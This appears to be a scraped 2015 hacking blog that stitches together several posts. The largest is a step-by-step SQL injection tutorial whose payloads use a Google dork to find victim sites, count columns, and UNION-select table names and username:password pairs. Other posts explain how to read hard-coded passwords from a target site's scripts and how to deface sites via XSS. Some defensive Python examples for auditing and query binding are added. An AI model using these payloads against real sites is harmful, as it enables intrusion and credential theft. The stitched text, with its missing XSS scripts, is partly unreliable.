Sunday, May 3, 2015

Simple Cool Tricks With Chrome Developer Tool

As you probably know, there is a button on the right-click menu of Google Chrome and IE 10+ called ''Inspect element''. This is the developer tool, and you can have a lot of fun with it. I'll give you two examples of how to use it in this tutorial.

1. Change the text of a webpage:

You can have fun on webpages just by changing the value of a <span> (a text label). For example, go to the 4shared.com site (a free file sharing site). Then create an account if you don't have one (or just connect with Google, Facebook or Twitter). When you are done, upload something that is heavy (more than 100 MB) by dragging and dropping it on the home page of 4shared. You will then see an uploading status window on the screen. Right-click on the percentage and click on ''Inspect element''. A little window now appears at the bottom of the web browser. There are two ways: either you got the number or you got the % symbol. If you got the number, try to find the symbol below it. Then double-click on it and type what you want (Eg: '',000,000 dollars in my bank account''). The change exists only in your own browser's copy of the page; nothing on the server is modified.

2. Get a Non-Crypted password in JS/PHP code:

Some sites are not very safe and just verify the password directly in the PHP/JS code. In that case, even if it has become rare, you can get the password. Just follow these steps:
1. Find the login form on the website you want to hack
2. Right-click on it and then click on ''Inspect element''
3. In the window that appeared, search for ''<form'' and then ''action=''
4. After it, there is a URL. If it ends with ''.js'', just copy it and paste it in the URL bar of your browser
5. If it ends with ''.php'', type ''view-source:'' before pasting the URL
6. Then search for something like ''password'' in the code.
WARNING: This method works better with JS than with PHP. Sometimes, there is no URL after ''action='' but just a JS function. Then you have to press Ctrl+U to see the source and search for ''password'' in the whole code.
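Site owners can run the same inspection on their own pages before anyone else does. The following is an added example, not code from the original post: it parses a constructed sample page and flags a login form that is handled in the browser and any password-like variable compared with a string literal. The sample page, the regular expression and the function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: a login form whose check runs entirely in the browser.
SAMPLE_PAGE = """
<form action="javascript:checkLogin()" method="post">
  <input name="user"> <input type="password" name="pass">
</form>
<script src="/static/login.js"></script>
<script>
function checkLogin() {
  var password = document.forms[0].pass.value;
  if (password == "letmein123") { location.href = "/members.html"; }
}
</script>
"""

# A credential-like identifier compared with a string literal (either order).
IDENT = r"[\w.$\[\]]*(?:pass(?:word|wd)?|pwd|secret)[\w.$\[\]]*"
LITERAL = r"""(?:"[^"\n]+"|'[^'\n]+')"""
COMPARE = re.compile(
    rf"(?:{IDENT}\s*[=!]==?\s*{LITERAL}|{LITERAL}\s*[=!]==?\s*{IDENT})",
    re.IGNORECASE)

class PageAudit(HTMLParser):
    """Collects form actions, external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.script_srcs, self.inline = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "script":
            if attrs.get("src"):
                self.script_srcs.append(attrs["src"])  # audit these files too
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def audit_page(html_text):
    """Return (findings, external script URLs) for one page's HTML."""
    parser = PageAudit()
    parser.feed(html_text)
    findings = []
    for action in parser.form_actions:
        low = action.lower()
        if low.startswith("javascript:") or low.endswith(".js"):
            findings.append(("client-side form handler", action))
    for body in parser.inline:
        for match in COMPARE.finditer(body):
            findings.append(("literal credential comparison", match.group(0)))
    return findings, parser.script_srcs
```

Anything this flags should move to a server-side check against a salted password hash, because code delivered to the browser is readable by every visitor.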

12 Simple Steps To Become A Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have the attitude and curiosity to learn and adapt new skills. You must have a deep knowledge of computer systems, programming languages and operating systems, and the journey of learning goes on and on. Some people think that a hacker is always a criminal who does illegal activities, but they are wrong. Actually many big companies hire hackers to protect their systems and information, and those hackers are highly paid. We have prepared a list of the 12 most important steps necessary to become a hacker; have a deeper look.

1. Learn UNIX/LINUX

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell Labs and contributed a lot to the world of security. You should install one of the freely available open source versions of LINUX on your desktop, as without learning UNIX/LINUX it is not possible to become a hacker.

2. Code in C language 

C programming is the basis for learning UNIX/LINUX, as this operating system is coded in C, which makes it the most powerful language compared to other programming languages. The C language was developed by Dennis Ritchie in the late 1970’s. To become a hacker you should master the C language.

3. Learn to code in more than one Programming Language

It is important for a person in the hacking field to learn more than one programming language. There are many programming languages to learn, such as Python, JAVA and C++. Free eBooks and tutorials are easily available online.

4. Learn Networking Concepts

Another important and essential step to become a hacker is to be good at networking concepts and to understand how networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in a system. Understanding what a LAN, WAN, VPN and firewall are is also important. You must have a clear understanding of network tools such as Wireshark and NMAP for packet analysis, network scanning etc.

5. Learn More Than One Operating System

It is essential for a hacker to learn more than one operating system. There are many other operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, and a hacker needs to find it in order to exploit it.

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and decryption are important skills in hacking. Encryption is widely used in several aspects of information system security: authentication, confidentiality and integrity of data. Information on a network, such as passwords, is in encrypted form. While hacking a system, these encrypted codes need to be broken, which is called decryption.

7. Learn more and more about hacking

Go through various tutorials and eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates to systems.

8. Experiment A Lot

After learning some concepts, sit and practice them. Set up your own lab for experimental purposes. You need a good computer system to start with, as some tools may require a powerful processor, RAM etc. Keep on testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

A vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.

10. Contribute To Open Source Security Projects

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA and APACHE offer open source projects. Contribute and be a part of them; even if your contribution is small, it will add big value to your field.

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems.

12. Join Discussions and meet hackers 

Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

Friday, April 24, 2015

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

This is my third article about Cross Site Scripting. Last time, I explained how to do vulnerability testing for XSS and some filter bypassing techniques. Now let us see how a hacker defaces a website with an XSS vulnerability. Never implement this technique. I am just explaining it for educational purposes only.

Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing is changing the content of the website to the hacker's content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it’s a bad idea..!

Script for changing the background color of a website:

Script for changing the background image of a website:

Defacement page with Pastehtml: First of all upload some defacement page (html) to pastehtml.com and get the link. When you find an XSS vulnerable site, then insert the script as :

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

Wednesday, April 15, 2015

Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide

You might have heard sometimes that you should not give your password, credit card information or any other sensitive information on public computers or in Facebook, Yahoo etc. chats. The reason, as you have probably heard, is that hackers have ways to steal your credit card numbers, passwords etc.




A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.

Secure Sockets Layer (SSL) is the most widely used technology for creating secure communication between the web client and the web server. You must be familiar with the http:// and https:// protocols, and you might be wondering what they mean. The HTTP protocol is used for standard communication between the web server and the client. HTTPS is used for secure communication.


Cryptography


If two users want to have a secure communication, they can also use cryptography to accomplish it.

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how I decrypted it. Here I have used Algorithm=+ for the communication and the key is “1“. What comes after S is T, so as you can see S is converted into T; the next letter of the word SECURE, E, is converted into F, and so on.






So if the hacker starts sniffing in the middle of the communication, he will get the encrypted text, and as the hacker does not know the key he can't decrypt it. But if the attacker is sniffing from the starting point, he will get the key and can easily decrypt the data.
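The "+" algorithm with key 1 from the example above, written out as an added example that is not part of the original post. It also shows why this shift is only a teaching device: it has just 25 usable keys, so an eavesdropper who never saw the key can try them all, whereas the keys SSL negotiates are far too large to enumerate. The word list and function names are constructed for illustration.

```python
import string

ALPHABET = string.ascii_uppercase

def shift(text, key):
    """Move each A-Z letter `key` places along the alphabet, wrapping at Z."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)  # leave digits, spaces and punctuation alone
    return "".join(out)

def encrypt(plaintext, key):
    """Algorithm '+': add the key to every letter."""
    return shift(plaintext, key)

def decrypt(ciphertext, key):
    """Reverse of encrypt: subtract the same key."""
    return shift(ciphertext, -key)

def candidates(ciphertext):
    """Every plaintext the ciphertext could stand for, one per possible key."""
    return {key: decrypt(ciphertext, key) for key in range(1, 26)}

# Constructed word list standing in for "does this look like real text?".
WORDS = {"SECURE", "PASSWORD", "LOGIN"}

def recover_without_key(ciphertext):
    """Return the (key, plaintext) pairs whose plaintext is a known word."""
    return [(k, p) for k, p in candidates(ciphertext).items() if p in WORDS]

if __name__ == "__main__":
    print(encrypt("SECURE", 1))
    print(recover_without_key("TFDVSF"))
```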




Standard Communication VS Secure communication 


Suppose there exist two communicating parties, A (client) and B (server).


Standard communication(HTTP)


When A sends information to B, it will be unencrypted. This is acceptable if A is not sharing confidential information, but if A is sending sensitive information, say “Password”, it will also be in unencrypted form. If a hacker starts sniffing the communication, he will get the password.

This scenario is illustrated using the following figure -



Standard Communications HTTP



Secure communication(HTTPS) 


In a secure communication, i.e. HTTPS, the conversation between A and B happens in a safe tunnel. The information which user A sends to B will be in encrypted form, so even if a hacker gets unauthorized access to the conversation he will receive the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure – 


Secure communication(HTTPS)




How is HTTPS implemented?


The HTTPS protocol can be implemented by using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL certificate.

Which websites need SSL Certificate?


Websites where a private conversation takes place, and websites related to online transactions or other sensitive information that needs to be protected, need an SSL certificate.




How to identify a Secure Connection?


In Internet Explorer and Google Chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8

A SQL Injection flaw is quite easy to exploit, and to protect against too, but only when you know how to do it. In continuation of our Injection attacks tutorial series, today we will learn about the Union Exploitation Technique to exploit a SQL Injection vulnerability. The Union exploitation technique is the most common and easiest way to exploit a SQL injection vulnerability to hack into websites, and if you know how to do it then the same knowledge works the other way around, i.e. to protect a SQL Injection vulnerability from being exploited by the Union Exploitation technique. So let's learn about the Union Exploitation Technique in detail with the help of examples.
Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.
But before that, let me brief all of you about what the Union operator is. Union is an inbuilt keyword in almost all databases which is used to join a query. In SQL, we normally use the Union operator to link another SQL query with the original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries to retrieve information like usernames, passwords and other juicy information from victims' databases.
Here’s a brief about procedure that we are going to learn to exploit SQL Injection using Union Exploitation Technique:
1. Find the Vulnerable website which is vulnerable to SQL Injection.
2. Find the Number of Columns in website using Order by clause.
3. Find most vulnerable columns which can be used to exploit SQL Injection Vulnerability using Union operator.
4. Test run to validate that column found is vulnerable by querying version information.
5. Use Information Schema to get Table Names
6. Use Information Schema to get Column Names
7. Use Information Schema to get Column values. For example: Username, passwords, customer information.
That’s all there is to the Union Exploitation technique for exploiting a SQL injection vulnerability to own or hack any vulnerable website. Now let's learn the process in detail.

Union Exploitation Technique to Exploit SQL Injection Vulnerability:

Step 1: Finding SQL injection vulnerable websites:

We have already learned this in our previous articles; if somebody missed it, here is a brief:
Use Google to find a vulnerable website by searching for the below query :
inurl:php?id=
There are several other dorks to find SQL injection vulnerable websites, but the above one is the easiest and its success rate is almost 90-95%.
Now Google search will display some results. Open any one of them, say
www.example.com/shop.php?id=6
Now to check whether it is vulnerable to SQL Injection or not, just add ' (single quote) at the end of it, i.e. the query will become something like below:
www.example.com/shop.php?id=6'
Now if you get an error something like below, then it means the website is vulnerable to SQL Injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
or something like below:
Query failed: You have an error in your SQL syntax near ''6''' at line 1
or any other error.

Step 2: Finding Exact Number Columns in Website

Once you know that the website is vulnerable to SQL Injection, the next step is to find the exact number of columns in the website database, which you can learn by running the below query :
www.example.com/shop.php?id=6 ORDER BY <NUM>--
Now say the website has 16 columns, which you don’t know; then you can get the number by using a binary search approach. For example, run a sequence like the one below:
www.example.com/shop.php?id=6 ORDER BY 10--
Result : Some page opens with data, i.e. no error page.
Then increment it by 10, i.e.
www.example.com/shop.php?id=6 ORDER BY 20--
and so on until you get the below error message :
Unknown column '<NUM>' in 'order clause'
or any other custom message.
Once you get the above error message, it means you exceeded the exact column count, so decrease it one by one until the error is gone. The last successful page gives the exact column count. Say you get 16 columns. Then the last successful request executed must be :
www.example.com/shop.php?id=6 ORDER BY 16--
These steps will give the exact number of columns in the database of the website.

Step 3: Finding Vulnerable Columns using UNION ALL clause.

Once you know the exact number of columns in the database, you can get the list of all vulnerable columns by running the below query:
www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
This will result in some page, and on that page some numbers will be displayed. Those are actually the vulnerable columns. Now say 2, 4 and 8 are displayed on the page. This means column 2, column 4 and column 8 are the most vulnerable columns, which can be used to run your own SQL queries.
If the above query execution shows the normal web page as it usually displays, then it means the query failed. Then we use the field exploitation technique by inserting '-' in the ID value. So the query will become something like below:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Wow, now you have some numbers scattered over the web page, which means vulnerable columns on the website.

Step 4: Test run to validate vulnerable columns

Now we have the list of all vulnerable columns; the next step is validating that we are correct. The easiest way to validate is executing the version() command in a vulnerable column. For example, say column 2 was vulnerable:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Now in place of 2 on the web page you will get the version number displayed. Check this for all vulnerable columns.

Step 5: Use information Schema to get Table Names

Now we know the vulnerable columns of the database; the next step is extracting table names from the database. This can be achieved by knowing the concepts of the information schema. Learn more about using the information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using the information schema we can execute queries as if we were administrators. So in order to extract table names we will run the below query on column 2 (vulnerable column).
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()--
The above query will give you the complete list of tables present in the database. You know which table you need to search for usernames and passwords :D.

Step 6: Use information schema to get Column names

Using the same concept used in step 5, we will use the information schema to extract column names too. Learn more about using the information schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now to extract column names from the database, the below query will work like Bulls Eye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()--
The above query will result in extracting all column names.

Step 7: Use Information Schema concept to get column values of required table

Well, till now we have table names and column names. The only thing left is data from the tables. Now say we got some table called USERS which has column names USERNAME and PASSWORD. In order to extract data from the USERS table the below query is sufficient :
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS--
The above query will result in displaying usernames and passwords in the format username:password, as 0x3a is the hex value for ':'.
That’s it guys, now you have usernames, passwords, table names and column names. What else do you need?
That’s all for today; we will continue to learn more about injection attacks in later tutorials. If you have any queries or doubts, feel free to ask.
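Every request in steps 1 to 7 succeeds only because shop.php pastes the id parameter into the text of its SQL statement. The added example below (not from the original article) runs the tutorial's probe shapes against that pattern and against a bound parameter; SQLite stands in for MySQL, and the three-column products table, the users row and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory shop database (SQLite standing in for MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES (6, 'Blue mug', '4.50');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db

def shop_vulnerable(db, raw_id):
    """The flawed pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def shop_bound(db, raw_id):
    """Bound parameter: the value is data and can never add SQL keywords."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def shop_fixed(db, raw_id):
    """Defence in depth: reject anything that is not an integer, then bind."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return []
    return shop_bound(db, product_id)

# Probe shapes from steps 1, 2 and 7, reduced to this 3-column sample table.
PAYLOADS = [
    "6",
    "6'",
    "6 ORDER BY 4--",
    "-6 UNION ALL SELECT 1,username,password FROM users--",
]

def run(handler, db, raw_id):
    """Return rows, or the error text a verbose page would show the visitor."""
    try:
        return handler(db, raw_id)
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)

if __name__ == "__main__":
    db = make_db()
    for payload in PAYLOADS:
        print(repr(payload))
        print("  concatenated:", run(shop_vulnerable, db, payload))
        print("  bound:       ", run(shop_fixed, db, payload))
```

With the bound version every probe returns the same empty result, so neither the error text used for column counting nor the UNION output is available; error details should in any case go to the server log rather than the page.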